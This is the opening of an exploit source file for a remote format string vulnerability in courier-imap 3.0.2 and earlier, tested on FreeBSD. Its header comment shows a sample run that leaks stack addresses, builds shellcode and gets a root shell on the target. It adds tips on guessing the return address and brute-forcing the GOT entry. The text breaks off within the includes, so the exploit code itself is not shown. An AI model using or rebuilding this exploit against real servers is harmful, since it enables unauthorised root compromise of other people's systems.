/*
courier-imap <= 3.0.2-r1 Remote Format String Vulnerability exploit

Author: ktha at hush dot com

Tested on FreeBSD 4.10-RELEASE with courier-imap-3.0.2

Special thanks goes to andrewg for providing the FreeBSD box.

Greetings: all the guys from irc pulltheplug com and irc netric org

bash-2.05b$ ./sm00ny-courier_imap_fsx
courier-imap <= 3.0.2-r1 Remote Format String Vulnerability exploit by ktha at hush dot com
[*] Launching attack against 127.0.0.1:143
[+] Got current ebp(5100): 0xbfbfb050
[+] Got possible saved ebp(3281): 0xbfbfe390
[+] Got possible write on the stack pointer(3293): 0xbfbfe3c0
[+] Verifying...failed
[+] Got possible saved ebp(3286): 0xbfbfe3a4
[+] Got possible write on the stack pointer(3298): 0xbfbfe3d4
[+] Verifying...failed
[+] Got possible saved ebp(3287): 0xbfbfe3a8
[+] Got possible write on the stack pointer(3299): 0xbfbfe3d8
[+] Verifying...OK
[+] Building fmt...done
[+] Building shellcode...done
[*] Using ret: 0x8057000
[*] Using got of fprintf(): 0x804fefc
[*] Checking for shell..
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)

N.B. 1. ret can be guessed ;)
2. got, well.. that's a different story, it must be bruteforced
3. "ce_number" & "se_number" can be set with some default values when running multiple times
4. shell is usable for approx. 1 min

[ Need a challenge ? ]
[ Visit http://www.pulltheplug.com ]

*/

#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <string.h>
#include <errno.h>
#include <signal.h>
#include <stdio.h>
/* CourierIMAP 3.0.2r1 auth_debug Remote Format String Exploit - ktha - 09/02/2004 */
#include <sys/stat.h>
#include <fcntl.h>

#define BIGBUF 2048

#de